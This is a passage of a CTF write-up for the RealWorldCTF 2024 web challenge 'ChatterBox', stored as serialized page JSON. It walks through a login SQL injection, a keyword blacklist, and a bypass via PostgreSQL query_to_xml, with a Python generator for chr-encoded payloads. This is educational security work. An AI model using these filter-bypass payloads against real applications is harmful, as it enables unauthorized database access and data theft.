[{"data":1,"prerenderedAt":4191},["ShallowReactive",2],{"content-query-ZwukyG4Bas":3},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":7,"head":9,"body":28,"_type":4185,"_id":4186,"_source":4187,"_file":4188,"_stem":4189,"_extension":4190},"/writeups/chatter-box","writeups",false,"","ChatterBox",{"title":10,"description":11,"keywords":12,"slug":13,"image":14,"date":15,"meta":16},"ChatterBox [UNINTENDED]","ChatterBox was a medium web challenge from RealWorldCTF 2024.","web,sqli,rce","chatter-box","https://res.cloudinary.com/dmju5zuhr/image/upload/v1706549525/writeups/real_world_ctf.webp","2024-01-27",[17,18,19,20,22,24,25,26],{"og:image":14},{"og:title":10},{"og:description":11},{"og:type":21},"article",{"og:url":23},"https://owalid.com/chatter-box",{"description":11},{"title":10},{"keywords":27},"web,sqli,rce,realworldctf,realworld,ctf,ChatterBox",{"type":29,"children":30,"toc":4178},"root",[31,39,46,51,56,62,67,347,353,358,363,389,394,400,405,487,492,496,503,508,513,525,530,535,539,544,549,554,799,805,810,823,1250,1255,1823,1849,1854,1866,2277,2282,2287,2362,2383,2410,2415,2426,2447,2497,2509,2514,2525,2538,2549,2554,2600,2605,2609,2615,2620,2631,2651,2656,2661,2667,2672,2677,2697,2702,2723,2734,2739,2744,2748,2753,2759,2771,2776,2780,2785,2790,2840,2845,2849,2854,2859,2927,2931,2935,2948,2953,3020,3025,3031,3036,3044,3546,3554,3994,4002,4143,4163,4168,4172],{"type":32,"tag":33,"props":34,"children":36},"element","h1",{"id":35},"chatterbox",[37],{"type":38,"value":8},"text",{"type":32,"tag":40,"props":41,"children":43},"h2",{"id":42},"introduction",[44],{"type":38,"value":45},"Introduction",{"type":32,"tag":47,"props":48,"children":49},"p",{},[50],{"type":38,"value":11},{"type":32,"tag":47,"props":52,"children":53},{},[54],{"type":38,"value":55},"We have the compiled source code in the form of a .jar file.",{"type":32,"tag":57,"props":58,"children":61},"custom-image",{"imgSrc":59,":width":60},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706558660/writeups/chatter-box/files.webp","330",[],{"type":32,"tag":47,"props":63,"children":64},{},[65],{"type":38,"value":66},"If we look at the dockerfile in detail, we can see that an elf file /readflag is copied so we can therefore say that the goal of the challenge is to rce on the target server",{"type":32,"tag":68,"props":69,"children":71},"code-card",{"lang":70},"docker",[72],{"type":32,"tag":73,"props":74,"children":77},"pre",{"code":75,"language":70,"meta":7,"className":76,"style":7},"FROM openjdk:17-slim\n\nRUN apt update \\\n    && apt install -y postgresql postgresql-contrib uuid vim gcc postgresql-13 postgresql-server-dev-13 file procps &&  apt install sudo -y\nRUN apt install -y libfindbin-libs-perl acl haveged\nRUN mkdir -p /logs && touch /logs/myapp.log && chmod 777 /logs/ && chmod 777 /logs/myapp.log\n\nCOPY init.sql /\nCOPY payload.c /tmp/\n\nUSER root\nUSER root\n\nCOPY ChatterBox-0.0.1-SNAPSHOT.jar /\nCOPY readflag /\nCOPY flag /\n\nRUN chmod 000 /flag\nCOPY start.sh /\nRUN chmod +x /start.sh\nENTRYPOINT [\"/start.sh\"]\n","language-docker shiki shiki-themes vitesse-dark",[78],{"type":32,"tag":79,"props":80,"children":81},"code",{"__ignoreMap":7},[82,100,110,124,133,146,159,167,181,194,202,216,228,236,249,262,275,283,296,309,322],{"type":32,"tag":83,"props":84,"children":87},"span",{"class":85,"line":86},"line",1,[88,94],{"type":32,"tag":83,"props":89,"children":91},{"style":90},"--shiki-default:#4D9375",[92],{"type":38,"value":93},"FROM",{"type":32,"tag":83,"props":95,"children":97},{"style":96},"--shiki-default:#DBD7CAEE",[98],{"type":38,"value":99}," openjdk:17-slim\n",{"type":32,"tag":83,"props":101,"children":103},{"class":85,"line":102},2,[104],{"type":32,"tag":83,"props":105,"children":107},{"emptyLinePlaceholder":106},true,[108],{"type":38,"value":109},"\n",{"type":32,"tag":83,"props":111,"children":113},{"class":85,"line":112},3,[114,119],{"type":32,"tag":83,"props":115,"children":116},{"style":90},[117],{"type":38,"value":118},"RUN",{"type":32,"tag":83,"props":120,"children":121},{"style":96},[122],{"type":38,"value":123}," apt update \\\n",{"type":32,"tag":83,"props":125,"children":127},{"class":85,"line":126},4,[128],{"type":32,"tag":83,"props":129,"children":130},{"style":96},[131],{"type":38,"value":132},"    && apt install -y postgresql postgresql-contrib uuid vim gcc postgresql-13 postgresql-server-dev-13 file procps &&  apt install sudo -y\n",{"type":32,"tag":83,"props":134,"children":136},{"class":85,"line":135},5,[137,141],{"type":32,"tag":83,"props":138,"children":139},{"style":90},[140],{"type":38,"value":118},{"type":32,"tag":83,"props":142,"children":143},{"style":96},[144],{"type":38,"value":145}," apt install -y libfindbin-libs-perl acl haveged\n",{"type":32,"tag":83,"props":147,"children":149},{"class":85,"line":148},6,[150,154],{"type":32,"tag":83,"props":151,"children":152},{"style":90},[153],{"type":38,"value":118},{"type":32,"tag":83,"props":155,"children":156},{"style":96},[157],{"type":38,"value":158}," mkdir -p /logs && touch /logs/myapp.log && chmod 777 /logs/ && chmod 777 /logs/myapp.log\n",{"type":32,"tag":83,"props":160,"children":162},{"class":85,"line":161},7,[163],{"type":32,"tag":83,"props":164,"children":165},{"emptyLinePlaceholder":106},[166],{"type":38,"value":109},{"type":32,"tag":83,"props":168,"children":170},{"class":85,"line":169},8,[171,176],{"type":32,"tag":83,"props":172,"children":173},{"style":90},[174],{"type":38,"value":175},"COPY",{"type":32,"tag":83,"props":177,"children":178},{"style":96},[179],{"type":38,"value":180}," init.sql /\n",{"type":32,"tag":83,"props":182,"children":184},{"class":85,"line":183},9,[185,189],{"type":32,"tag":83,"props":186,"children":187},{"style":90},[188],{"type":38,"value":175},{"type":32,"tag":83,"props":190,"children":191},{"style":96},[192],{"type":38,"value":193}," payload.c /tmp/\n",{"type":32,"tag":83,"props":195,"children":197},{"class":85,"line":196},10,[198],{"type":32,"tag":83,"props":199,"children":200},{"emptyLinePlaceholder":106},[201],{"type":38,"value":109},{"type":32,"tag":83,"props":203,"children":205},{"class":85,"line":204},11,[206,211],{"type":32,"tag":83,"props":207,"children":208},{"style":90},[209],{"type":38,"value":210},"USER",{"type":32,"tag":83,"props":212,"children":213},{"style":96},[214],{"type":38,"value":215}," root\n",{"type":32,"tag":83,"props":217,"children":219},{"class":85,"line":218},12,[220,224],{"type":32,"tag":83,"props":221,"children":222},{"style":90},[223],{"type":38,"value":210},{"type":32,"tag":83,"props":225,"children":226},{"style":96},[227],{"type":38,"value":215},{"type":32,"tag":83,"props":229,"children":231},{"class":85,"line":230},13,[232],{"type":32,"tag":83,"props":233,"children":234},{"emptyLinePlaceholder":106},[235],{"type":38,"value":109},{"type":32,"tag":83,"props":237,"children":239},{"class":85,"line":238},14,[240,244],{"type":32,"tag":83,"props":241,"children":242},{"style":90},[243],{"type":38,"value":175},{"type":32,"tag":83,"props":245,"children":246},{"style":96},[247],{"type":38,"value":248}," ChatterBox-0.0.1-SNAPSHOT.jar /\n",{"type":32,"tag":83,"props":250,"children":252},{"class":85,"line":251},15,[253,257],{"type":32,"tag":83,"props":254,"children":255},{"style":90},[256],{"type":38,"value":175},{"type":32,"tag":83,"props":258,"children":259},{"style":96},[260],{"type":38,"value":261}," readflag /\n",{"type":32,"tag":83,"props":263,"children":265},{"class":85,"line":264},16,[266,270],{"type":32,"tag":83,"props":267,"children":268},{"style":90},[269],{"type":38,"value":175},{"type":32,"tag":83,"props":271,"children":272},{"style":96},[273],{"type":38,"value":274}," flag /\n",{"type":32,"tag":83,"props":276,"children":278},{"class":85,"line":277},17,[279],{"type":32,"tag":83,"props":280,"children":281},{"emptyLinePlaceholder":106},[282],{"type":38,"value":109},{"type":32,"tag":83,"props":284,"children":286},{"class":85,"line":285},18,[287,291],{"type":32,"tag":83,"props":288,"children":289},{"style":90},[290],{"type":38,"value":118},{"type":32,"tag":83,"props":292,"children":293},{"style":96},[294],{"type":38,"value":295}," chmod 000 /flag\n",{"type":32,"tag":83,"props":297,"children":299},{"class":85,"line":298},19,[300,304],{"type":32,"tag":83,"props":301,"children":302},{"style":90},[303],{"type":38,"value":175},{"type":32,"tag":83,"props":305,"children":306},{"style":96},[307],{"type":38,"value":308}," start.sh /\n",{"type":32,"tag":83,"props":310,"children":312},{"class":85,"line":311},20,[313,317],{"type":32,"tag":83,"props":314,"children":315},{"style":90},[316],{"type":38,"value":118},{"type":32,"tag":83,"props":318,"children":319},{"style":96},[320],{"type":38,"value":321}," chmod +x /start.sh\n",{"type":32,"tag":83,"props":323,"children":325},{"class":85,"line":324},21,[326,331,336,342],{"type":32,"tag":83,"props":327,"children":328},{"style":90},[329],{"type":38,"value":330},"ENTRYPOINT",{"type":32,"tag":83,"props":332,"children":333},{"style":96},[334],{"type":38,"value":335}," [",{"type":32,"tag":83,"props":337,"children":339},{"style":338},"--shiki-default:#C98A7D",[340],{"type":38,"value":341},"\"/start.sh\"",{"type":32,"tag":83,"props":343,"children":344},{"style":96},[345],{"type":38,"value":346},"]\n",{"type":32,"tag":40,"props":348,"children":350},{"id":349},"recon",[351],{"type":38,"value":352},"Recon",{"type":32,"tag":57,"props":354,"children":357},{"imgSrc":355,":width":356},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706558732/writeups/chatter-box/files_decompiled.webp","500",[],{"type":32,"tag":47,"props":359,"children":360},{},[361],{"type":38,"value":362},"After decompiling the .jar file, we can see that there are 3 controllers:",{"type":32,"tag":364,"props":365,"children":366},"ul",{},[367,373,378],{"type":32,"tag":368,"props":369,"children":370},"li",{},[371],{"type":38,"value":372},"LoginController: This controller allows a user to connect.",{"type":32,"tag":368,"props":374,"children":375},{},[376],{"type":38,"value":377},"MessageBoardController: Allows adding a message to the database and displaying the list of messages.",{"type":32,"tag":368,"props":379,"children":380},{},[381,383],{"type":38,"value":382},"NotifyController: Allows rendering an html file via the filename passed as parameter ",{"type":32,"tag":79,"props":384,"children":386},{"className":385},[],[387],{"type":38,"value":388},"fname",{"type":32,"tag":47,"props":390,"children":391},{},[392],{"type":38,"value":393},"In the initialization of the database, we can see that there is an admin user with the id 1. Once connected, this user is able to interact with the two controllers \"MessageBoardController\" and \"NotifyController\".",{"type":32,"tag":40,"props":395,"children":397},{"id":396},"sql-injection",[398],{"type":38,"value":399},"SQL Injection",{"type":32,"tag":47,"props":401,"children":402},{},[403],{"type":38,"value":404},"By looking in detail at the Login controller, we can see that the endpoint allowing the user to connect contained an SQL injection.",{"type":32,"tag":68,"props":406,"children":408},{"lang":407},"java",[409],{"type":32,"tag":73,"props":410,"children":413},{"code":411,"language":407,"meta":7,"className":412,"style":7},"String sql = \"SELECT id,passwd FROM message_users WHERE username = '\" + username + \"'\";\n","language-java shiki shiki-themes vitesse-dark",[414],{"type":32,"tag":79,"props":415,"children":416},{"__ignoreMap":7},[417],{"type":32,"tag":83,"props":418,"children":419},{"class":85,"line":86},[420,425,431,437,443,448,453,459,464,469,473,478,482],{"type":32,"tag":83,"props":421,"children":422},{"style":96},[423],{"type":38,"value":424},"String",{"type":32,"tag":83,"props":426,"children":428},{"style":427},"--shiki-default:#BD976A",[429],{"type":38,"value":430}," sql",{"type":32,"tag":83,"props":432,"children":434},{"style":433},"--shiki-default:#666666",[435],{"type":38,"value":436}," =",{"type":32,"tag":83,"props":438,"children":440},{"style":439},"--shiki-default:#C98A7D77",[441],{"type":38,"value":442}," \"",{"type":32,"tag":83,"props":444,"children":445},{"style":338},[446],{"type":38,"value":447},"SELECT id,passwd FROM message_users WHERE username = '",{"type":32,"tag":83,"props":449,"children":450},{"style":439},[451],{"type":38,"value":452},"\"",{"type":32,"tag":83,"props":454,"children":456},{"style":455},"--shiki-default:#CB7676",[457],{"type":38,"value":458}," +",{"type":32,"tag":83,"props":460,"children":461},{"style":96},[462],{"type":38,"value":463}," username ",{"type":32,"tag":83,"props":465,"children":466},{"style":455},[467],{"type":38,"value":468},"+",{"type":32,"tag":83,"props":470,"children":471},{"style":439},[472],{"type":38,"value":442},{"type":32,"tag":83,"props":474,"children":475},{"style":338},[476],{"type":38,"value":477},"'",{"type":32,"tag":83,"props":479,"children":480},{"style":439},[481],{"type":38,"value":452},{"type":32,"tag":83,"props":483,"children":484},{"style":433},[485],{"type":38,"value":486},";\n",{"type":32,"tag":47,"props":488,"children":489},{},[490],{"type":38,"value":491},"The only problem is that we have to bypass several checks:",{"type":32,"tag":57,"props":493,"children":495},{"imgSrc":494},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706558895/writeups/chatter-box/login_controller.webp",[],{"type":32,"tag":497,"props":498,"children":500},"h3",{"id":499},"bypass-first-check-blacklist",[501],{"type":38,"value":502},"Bypass first check (blacklist)",{"type":32,"tag":47,"props":504,"children":505},{},[506],{"type":38,"value":507},"The first check is a blacklist check.",{"type":32,"tag":47,"props":509,"children":510},{},[511],{"type":38,"value":512},"The blacklist constitutes a large part of keywords usable in an injection.",{"type":32,"tag":68,"props":514,"children":516},{"lang":515},"txt",[517],{"type":32,"tag":73,"props":518,"children":520},{"code":519},"\"SELECT\",\"UNION\",\"INSERT\",\"ALTER\",\"SLEEP\",\"DELETE\",\"--\",\";\",\"#\",\"&\",\"/*\",\"OR\",\"EXEC\",\"CREATE\",\"AND\",\"DROP\",\n\"DO\",\"COPY\",\"SET\",\"VACUUM\",\"SHOW\",\"CURSOR\",\"TRUNCATE\",\"CAST\",\"BEGIN\",\"PERFORM\",\"END\",\"CASE\",\"WHEN\",\"ALL\",\n\"TABLE\",\"UPDATE\",\"TRIGGER\",\"FUNCTION\",\"PROCEDURE\",\"DECLARE\",\"RETURNING\",\"TABLESPACE\",\"VIEW\",\"SEQUENCE\",\n\"INDEX\",\"LOCK\",\"GRANT\",\"REVOKE\",\"SAVEPOINT\",\"ROLLBACK\",\"IMPORT\",\"COMMIT\",\"PREPARE\",\"EXECUTE\",\"EXPLAIN\",\n\"ANALYZE\",\"DATABASE\",\"PASSWORD\",\"CONNECT\",\"DISCONNECT\",\"PG_SLEEP\",\"MERGE\",\"USING\",\"LIMIT\",\"OFFSET\",\"RETURN\",\n\"ESCAPE\",\"LIKE\",\"ILIKE\",\"RLIKE\",\"EXISTS\",\"BETWEEN\",\"IS\",\"NULL\",\"NOT\",\"GROUP\",\"BY\",\"HAVING\",\"ORDER\",\"WINDOW\",\n\"PARTITION\",\"OVER\",\"FOREIGN KEY\",\"REFERENCE\",\"RAISE\",\"LISTEN\",\"NOTIFY\",\"LOAD\",\"SECURITY\",\"OWNER\",\"RULE\",\n\"CLUSTER\",\"COMMENT\",\"CONVERT\",\"COPY\",\"CHECKPOINT\",\"REINDEX\",\"RESET\",\"LANGUAGE\",\"PLPGSQL\",\"PLPYTHON\",\n\"SECDEF\",\"NOCREATEDB\",\"NOCREATEROLE\",\"NOINHERIT\",\"NOREPLICATION\",\"BYPASSRLS\",\"FILE\",\"PG_\",\"IMPORT\",\"EXPORT\"\n",[521],{"type":32,"tag":79,"props":522,"children":523},{"__ignoreMap":7},[524],{"type":38,"value":519},{"type":32,"tag":47,"props":526,"children":527},{},[528],{"type":38,"value":529},"One of the most restrictive things is that in the blacklist, it is forbidden to use comments.",{"type":32,"tag":47,"props":531,"children":532},{},[533],{"type":38,"value":534},"We need to use a postgresql function that would allow us to execute a query without it being in the blacklist.",{"type":32,"tag":57,"props":536,"children":538},{"imgSrc":537},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706558929/writeups/chatter-box/doc_query_to_xml.webp",[],{"type":32,"tag":47,"props":540,"children":541},{},[542],{"type":38,"value":543},"As shown in the postgresql documentation, the query_to_xml function allows you to execute a query passed as a parameter and return the result in xml format.",{"type":32,"tag":47,"props":545,"children":546},{},[547],{"type":38,"value":548},"And bingo !!! This function is not on the blacklist.",{"type":32,"tag":47,"props":550,"children":551},{},[552],{"type":38,"value":553},"For ease, here is a small python code that allows to generate a payload via a sql query. By encoding the request with CHR.",{"type":32,"tag":68,"props":555,"children":557},{"lang":556},"python",[558],{"type":32,"tag":73,"props":559,"children":562},{"code":560,"language":556,"meta":7,"className":561,"style":7},"def get_payload(query):\n    payload_chr = [\"||\".join(f\"chr({ord(query[i])})\" for i in range(0, len(query)))][0]\n    print(f\"'query_to_xml({payload_chr},true,true,'')'\")\n","language-python shiki shiki-themes vitesse-dark",[563],{"type":32,"tag":79,"props":564,"children":565},{"__ignoreMap":7},[566,595,755],{"type":32,"tag":83,"props":567,"children":568},{"class":85,"line":86},[569,574,580,585,590],{"type":32,"tag":83,"props":570,"children":571},{"style":455},[572],{"type":38,"value":573},"def",{"type":32,"tag":83,"props":575,"children":577},{"style":576},"--shiki-default:#80A665",[578],{"type":38,"value":579}," get_payload",{"type":32,"tag":83,"props":581,"children":582},{"style":433},[583],{"type":38,"value":584},"(",{"type":32,"tag":83,"props":586,"children":587},{"style":96},[588],{"type":38,"value":589},"query",{"type":32,"tag":83,"props":591,"children":592},{"style":433},[593],{"type":38,"value":594},"):\n",{"type":32,"tag":83,"props":596,"children":597},{"class":85,"line":102},[598,603,608,612,616,621,625,630,635,639,644,649,655,661,665,669,674,679,684,689,694,699,704,709,714,718,724,729,734,738,742,747,751],{"type":32,"tag":83,"props":599,"children":600},{"style":96},[601],{"type":38,"value":602},"    payload_chr ",{"type":32,"tag":83,"props":604,"children":605},{"style":433},[606],{"type":38,"value":607},"=",{"type":32,"tag":83,"props":609,"children":610},{"style":433},[611],{"type":38,"value":335},{"type":32,"tag":83,"props":613,"children":614},{"style":439},[615],{"type":38,"value":452},{"type":32,"tag":83,"props":617,"children":618},{"style":338},[619],{"type":38,"value":620},"||",{"type":32,"tag":83,"props":622,"children":623},{"style":439},[624],{"type":38,"value":452},{"type":32,"tag":83,"props":626,"children":627},{"style":433},[628],{"type":38,"value":629},".",{"type":32,"tag":83,"props":631,"children":632},{"style":96},[633],{"type":38,"value":634},"join",{"type":32,"tag":83,"props":636,"children":637},{"style":433},[638],{"type":38,"value":584},{"type":32,"tag":83,"props":640,"children":641},{"style":455},[642],{"type":38,"value":643},"f",{"type":32,"tag":83,"props":645,"children":646},{"style":338},[647],{"type":38,"value":648},"\"chr(",{"type":32,"tag":83,"props":650,"children":652},{"style":651},"--shiki-default:#C99076",[653],{"type":38,"value":654},"{",{"type":32,"tag":83,"props":656,"children":658},{"style":657},"--shiki-default:#B8A965",[659],{"type":38,"value":660},"ord",{"type":32,"tag":83,"props":662,"children":663},{"style":433},[664],{"type":38,"value":584},{"type":32,"tag":83,"props":666,"children":667},{"style":96},[668],{"type":38,"value":589},{"type":32,"tag":83,"props":670,"children":671},{"style":433},[672],{"type":38,"value":673},"[",{"type":32,"tag":83,"props":675,"children":676},{"style":96},[677],{"type":38,"value":678},"i",{"type":32,"tag":83,"props":680,"children":681},{"style":433},[682],{"type":38,"value":683},"])",{"type":32,"tag":83,"props":685,"children":686},{"style":651},[687],{"type":38,"value":688},"}",{"type":32,"tag":83,"props":690,"children":691},{"style":338},[692],{"type":38,"value":693},")\"",{"type":32,"tag":83,"props":695,"children":696},{"style":90},[697],{"type":38,"value":698}," for",{"type":32,"tag":83,"props":700,"children":701},{"style":96},[702],{"type":38,"value":703}," i ",{"type":32,"tag":83,"props":705,"children":706},{"style":90},[707],{"type":38,"value":708},"in",{"type":32,"tag":83,"props":710,"children":711},{"style":657},[712],{"type":38,"value":713}," range",{"type":32,"tag":83,"props":715,"children":716},{"style":433},[717],{"type":38,"value":584},{"type":32,"tag":83,"props":719,"children":721},{"style":720},"--shiki-default:#4C9A91",[722],{"type":38,"value":723},"0",{"type":32,"tag":83,"props":725,"children":726},{"style":433},[727],{"type":38,"value":728},",",{"type":32,"tag":83,"props":730,"children":731},{"style":657},[732],{"type":38,"value":733}," len",{"type":32,"tag":83,"props":735,"children":736},{"style":433},[737],{"type":38,"value":584},{"type":32,"tag":83,"props":739,"children":740},{"style":96},[741],{"type":38,"value":589},{"type":32,"tag":83,"props":743,"children":744},{"style":433},[745],{"type":38,"value":746},")))][",{"type":32,"tag":83,"props":748,"children":749},{"style":720},[750],{"type":38,"value":723},{"type":32,"tag":83,"props":752,"children":753},{"style":433},[754],{"type":38,"value":346},{"type":32,"tag":83,"props":756,"children":757},{"class":85,"line":112},[758,763,767,771,776,780,785,789,794],{"type":32,"tag":83,"props":759,"children":760},{"style":657},[761],{"type":38,"value":762},"    print",{"type":32,"tag":83,"props":764,"children":765},{"style":433},[766],{"type":38,"value":584},{"type":32,"tag":83,"props":768,"children":769},{"style":455},[770],{"type":38,"value":643},{"type":32,"tag":83,"props":772,"children":773},{"style":338},[774],{"type":38,"value":775},"\"'query_to_xml(",{"type":32,"tag":83,"props":777,"children":778},{"style":651},[779],{"type":38,"value":654},{"type":32,"tag":83,"props":781,"children":782},{"style":96},[783],{"type":38,"value":784},"payload_chr",{"type":32,"tag":83,"props":786,"children":787},{"style":651},[788],{"type":38,"value":688},{"type":32,"tag":83,"props":790,"children":791},{"style":338},[792],{"type":38,"value":793},",true,true,'')'\"",{"type":32,"tag":83,"props":795,"children":796},{"style":433},[797],{"type":38,"value":798},")\n",{"type":32,"tag":497,"props":800,"children":802},{"id":801},"bypass-second-check",[803],{"type":38,"value":804},"Bypass second check",{"type":32,"tag":47,"props":806,"children":807},{},[808],{"type":38,"value":809},"So now we have a function that executes the query we want. But the problem now is that another check is applied after the blacklist.",{"type":32,"tag":47,"props":811,"children":812},{},[813,815,821],{"type":38,"value":814},"The second filter will call the ",{"type":32,"tag":79,"props":816,"children":818},{"className":817},[],[819],{"type":38,"value":820},"parse",{"type":38,"value":822}," function. This function will process a check depending on whether the query is of type 'select' or 'insert’.",{"type":32,"tag":68,"props":824,"children":825},{"lang":407},[826],{"type":32,"tag":73,"props":827,"children":829},{"code":828,"language":407,"meta":7,"className":412,"style":7},"public static boolean parse(String sql) {\n  try {\n      CCJSqlParserManager parserManager = new CCJSqlParserManager();\n      Statement statement = parserManager.parse(new StringReader(sql));\n      if (statement instanceof Select) {\n        return processSelect((Select)statement);\n      } else {\n        return statement instanceof Insert ? processInsert((Insert)statement) : false;\n      }\n  } catch (Exception var3) {\n    var3.printStackTrace();\n      throw new SQLException(\"SQL error\");\n  }\n}\n",[830],{"type":32,"tag":79,"props":831,"children":832},{"__ignoreMap":7},[833,875,887,919,976,1012,1049,1066,1132,1140,1175,1196,1234,1242],{"type":32,"tag":83,"props":834,"children":835},{"class":85,"line":86},[836,841,846,851,856,860,865,870],{"type":32,"tag":83,"props":837,"children":838},{"style":455},[839],{"type":38,"value":840},"public",{"type":32,"tag":83,"props":842,"children":843},{"style":455},[844],{"type":38,"value":845}," static",{"type":32,"tag":83,"props":847,"children":848},{"style":455},[849],{"type":38,"value":850}," boolean",{"type":32,"tag":83,"props":852,"children":853},{"style":576},[854],{"type":38,"value":855}," parse",{"type":32,"tag":83,"props":857,"children":858},{"style":433},[859],{"type":38,"value":584},{"type":32,"tag":83,"props":861,"children":862},{"style":96},[863],{"type":38,"value":864},"String sql",{"type":32,"tag":83,"props":866,"children":867},{"style":433},[868],{"type":38,"value":869},")",{"type":32,"tag":83,"props":871,"children":872},{"style":433},[873],{"type":38,"value":874}," {\n",{"type":32,"tag":83,"props":876,"children":877},{"class":85,"line":102},[878,883],{"type":32,"tag":83,"props":879,"children":880},{"style":90},[881],{"type":38,"value":882},"  try",{"type":32,"tag":83,"props":884,"children":885},{"style":433},[886],{"type":38,"value":874},{"type":32,"tag":83,"props":888,"children":889},{"class":85,"line":112},[890,895,900,904,909,914],{"type":32,"tag":83,"props":891,"children":892},{"style":96},[893],{"type":38,"value":894},"      CCJSqlParserManager",{"type":32,"tag":83,"props":896,"children":897},{"style":427},[898],{"type":38,"value":899}," parserManager",{"type":32,"tag":83,"props":901,"children":902},{"style":433},[903],{"type":38,"value":436},{"type":32,"tag":83,"props":905,"children":906},{"style":90},[907],{"type":38,"value":908}," new",{"type":32,"tag":83,"props":910,"children":911},{"style":576},[912],{"type":38,"value":913}," CCJSqlParserManager",{"type":32,"tag":83,"props":915,"children":916},{"style":433},[917],{"type":38,"value":918},"();\n",{"type":32,"tag":83,"props":920,"children":921},{"class":85,"line":126},[922,927,932,936,940,944,948,952,957,962,966,971],{"type":32,"tag":83,"props":923,"children":924},{"style":96},[925],{"type":38,"value":926},"      Statement",{"type":32,"tag":83,"props":928,"children":929},{"style":427},[930],{"type":38,"value":931}," statement",{"type":32,"tag":83,"props":933,"children":934},{"style":433},[935],{"type":38,"value":436},{"type":32,"tag":83,"props":937,"children":938},{"style":427},[939],{"type":38,"value":899},{"type":32,"tag":83,"props":941,"children":942},{"style":433},[943],{"type":38,"value":629},{"type":32,"tag":83,"props":945,"children":946},{"style":576},[947],{"type":38,"value":820},{"type":32,"tag":83,"props":949,"children":950},{"style":433},[951],{"type":38,"value":584},{"type":32,"tag":83,"props":953,"children":954},{"style":90},[955],{"type":38,"value":956},"new",{"type":32,"tag":83,"props":958,"children":959},{"style":576},[960],{"type":38,"value":961}," StringReader",{"type":32,"tag":83,"props":963,"children":964},{"style":433},[965],{"type":38,"value":584},{"type":32,"tag":83,"props":967,"children":968},{"style":96},[969],{"type":38,"value":970},"sql",{"type":32,"tag":83,"props":972,"children":973},{"style":433},[974],{"type":38,"value":975},"));\n",{"type":32,"tag":83,"props":977,"children":978},{"class":85,"line":135},[979,984,989,994,999,1004,1008],{"type":32,"tag":83,"props":980,"children":981},{"style":90},[982],{"type":38,"value":983},"      if",{"type":32,"tag":83,"props":985,"children":986},{"style":433},[987],{"type":38,"value":988}," (",{"type":32,"tag":83,"props":990,"children":991},{"style":96},[992],{"type":38,"value":993},"statement ",{"type":32,"tag":83,"props":995,"children":996},{"style":455},[997],{"type":38,"value":998},"instanceof",{"type":32,"tag":83,"props":1000,"children":1001},{"style":96},[1002],{"type":38,"value":1003}," Select",{"type":32,"tag":83,"props":1005,"children":1006},{"style":433},[1007],{"type":38,"value":869},{"type":32,"tag":83,"props":1009,"children":1010},{"style":433},[1011],{"type":38,"value":874},{"type":32,"tag":83,"props":1013,"children":1014},{"class":85,"line":148},[1015,1020,1025,1030,1035,1039,1044],{"type":32,"tag":83,"props":1016,"children":1017},{"style":90},[1018],{"type":38,"value":1019},"        return",{"type":32,"tag":83,"props":1021,"children":1022},{"style":576},[1023],{"type":38,"value":1024}," processSelect",{"type":32,"tag":83,"props":1026,"children":1027},{"style":433},[1028],{"type":38,"value":1029},"((",{"type":32,"tag":83,"props":1031,"children":1032},{"style":96},[1033],{"type":38,"value":1034},"Select",{"type":32,"tag":83,"props":1036,"children":1037},{"style":433},[1038],{"type":38,"value":869},{"type":32,"tag":83,"props":1040,"children":1041},{"style":96},[1042],{"type":38,"value":1043},"statement",{"type":32,"tag":83,"props":1045,"children":1046},{"style":433},[1047],{"type":38,"value":1048},");\n",{"type":32,"tag":83,"props":1050,"children":1051},{"class":85,"line":161},[1052,1057,1062],{"type":32,"tag":83,"props":1053,"children":1054},{"style":433},[1055],{"type":38,"value":1056},"      }",{"type":32,"tag":83,"props":1058,"children":1059},{"style":90},[1060],{"type":38,"value":1061}," else",{"type":32,"tag":83,"props":1063,"children":1064},{"style":433},[1065],{"type":38,"value":874},{"type":32,"tag":83,"props":1067,"children":1068},{"class":85,"line":169},[1069,1073,1078,1082,1087,1092,1097,1101,1106,1110,1114,1118,1123,1128],{"type":32,"tag":83,"props":1070,"children":1071},{"style":90},[1072],{"type":38,"value":1019},{"type":32,"tag":83,"props":1074,"children":1075},{"style":96},[1076],{"type":38,"value":1077}," statement ",{"type":32,"tag":83,"props":1079,"children":1080},{"style":455},[1081],{"type":38,"value":998},{"type":32,"tag":83,"props":1083,"children":1084},{"style":96},[1085],{"type":38,"value":1086}," Insert ",{"type":32,"tag":83,"props":1088,"children":1089},{"style":90},[1090],{"type":38,"value":1091},"?",{"type":32,"tag":83,"props":1093,"children":1094},{"style":576},[1095],{"type":38,"value":1096}," processInsert",{"type":32,"tag":83,"props":1098,"children":1099},{"style":433},[1100],{"type":38,"value":1029},{"type":32,"tag":83,"props":1102,"children":1103},{"style":96},[1104],{"type":38,"value":1105},"Insert",{"type":32,"tag":83,"props":1107,"children":1108},{"style":433},[1109],{"type":38,"value":869},{"type":32,"tag":83,"props":1111,"children":1112},{"style":96},[1113],{"type":38,"value":1043},{"type":32,"tag":83,"props":1115,"children":1116},{"style":433},[1117],{"type":38,"value":869},{"type":32,"tag":83,"props":1119,"children":1120},{"style":90},[1121],{"type":38,"value":1122}," :",{"type":32,"tag":83,"props":1124,"children":1125},{"style":90},[1126],{"type":38,"value":1127}," false",{"type":32,"tag":83,"props":1129,"children":1130},{"style":433},[1131],{"type":38,"value":486},{"type":32,"tag":83,"props":1133,"children":1134},{"class":85,"line":183},[1135],{"type":32,"tag":83,"props":1136,"children":1137},{"style":433},[1138],{"type":38,"value":1139},"      }\n",{"type":32,"tag":83,"props":1141,"children":1142},{"class":85,"line":196},[1143,1148,1153,1157,1162,1167,1171],{"type":32,"tag":83,"props":1144,"children":1145},{"style":433},[1146],{"type":38,"value":1147},"  }",{"type":32,"tag":83,"props":1149,"children":1150},{"style":90},[1151],{"type":38,"value":1152}," catch",{"type":32,"tag":83,"props":1154,"children":1155},{"style":433},[1156],{"type":38,"value":988},{"type":32,"tag":83,"props":1158,"children":1159},{"style":96},[1160],{"type":38,"value":1161},"Exception 